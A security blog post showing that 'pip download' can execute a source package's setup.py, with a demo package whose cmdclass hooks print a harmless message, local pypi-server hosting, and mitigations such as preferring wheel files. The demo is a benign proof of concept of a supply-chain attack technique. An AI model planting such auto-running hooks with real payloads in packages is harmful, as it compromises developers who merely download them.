Malicious Python Packages and Code Execution via pip download

This week I learned about a design flaw with pip download, which allows an adversary to run arbitrary code.

I assumed that running pip install means anything could happen, but pip download seems a bit surprising.

Both seem useful for red teaming though.

Background

This post from Yehuda Gelb named Automatic Execution of Code Upon Package Download on Python Package Manager which the Security Now! podcast pointed me towards.

The post highlights that just running pip download can compromise your computer.

It turns out that this behavior is known since at least 2014, based on a pip Github issue named Avoid generating metadata in pip download which raised this concern.

Let’s investigate this more closely.

Authoring a Python package

I had never built a python package before, but the process is well documented. There are different ways to go about it, and the vulnerability exists when using the older setup.py variation and when the package is in a .tar.gz.

There is a basic project I put together on Github:

git clone https://github.com/wunderwuzzi23/this_is_fine_wuzzi

The key piece, which took a few minutes to figure out (stackoverflow is your friend), was to figure out how to specify a command to run.

The way I went about it (not sure if there are others), is to include cmdclass in the setup, which causes pip to execute the provided command function upon both download and install of the package.

...
cmdclass={
        'install' : RunInstallCommand,
        'egg_info': RunEggInfoCommand
    },
...

My demo just runs a print command:

...
def RunCommand():
    print("Hello, p0wnd!")


class RunInstallCommand(install):
    def run(self):
        RunCommand()
        install.run(self)
...

Now, we are good to go.

Building the package

The next step is to bundle it up in a package, which is done using:

python -m build

This will create a ./dist/ folder containing the wheel and tar.gz files.

For this demo exploit we are only interesting in the tar.gz. file.

In case you encounter errors building, make sure to have setuptools and build packages installed.

Hosting the package using pypi-server

Now it’s time to host the package on a server.

To test this out, I decided to host the package on my own test pypi-server.

pypi-server run -v -p 8080 ./packages

Then copy the tar.gz file to your pypi-server’s ./packages folder.

Hosting a package

Above screenshot shows how this looks once running.

Download or Install the package

Using the --index-url it’s possible to point pip to an alternate package server, which is what we can leverage to test this out:

pip download this_is_fine_wuzzi --index-url http://amstrad:8080 --trusted-host amstrad -v

And our code will run now as part of this.

Notes:

  1. Messages printed to console won’t be shown unless you specify -v.
  2. The --trusted-host option was added because this was quick demo test. If you have a TLS connection with a valid certificate this will not be needed.

There are now tons of ways this can be abused, e.g. just thinking of Jupyter notebooks or Google Colab, etc.

Mitigations

The setup.py is only executed if the package is in tar.gz format. So, either reviewing the tar file or making sure there is a wheel file (.whl) present and used.

You can enumerate the offered packages via https://packagemanager/simple/<package-name>.

This way one can see what files are hosted for the package (tar or wheel, or both), and download (e.g. wget) and inspect the tar.gz file if that is the only option.

Conclusions

Having a pip download execute arbitrary code is quite unexpected and easy to repro and perform for an attacker. Make sure to inspect packages before you download or install them using pip.

References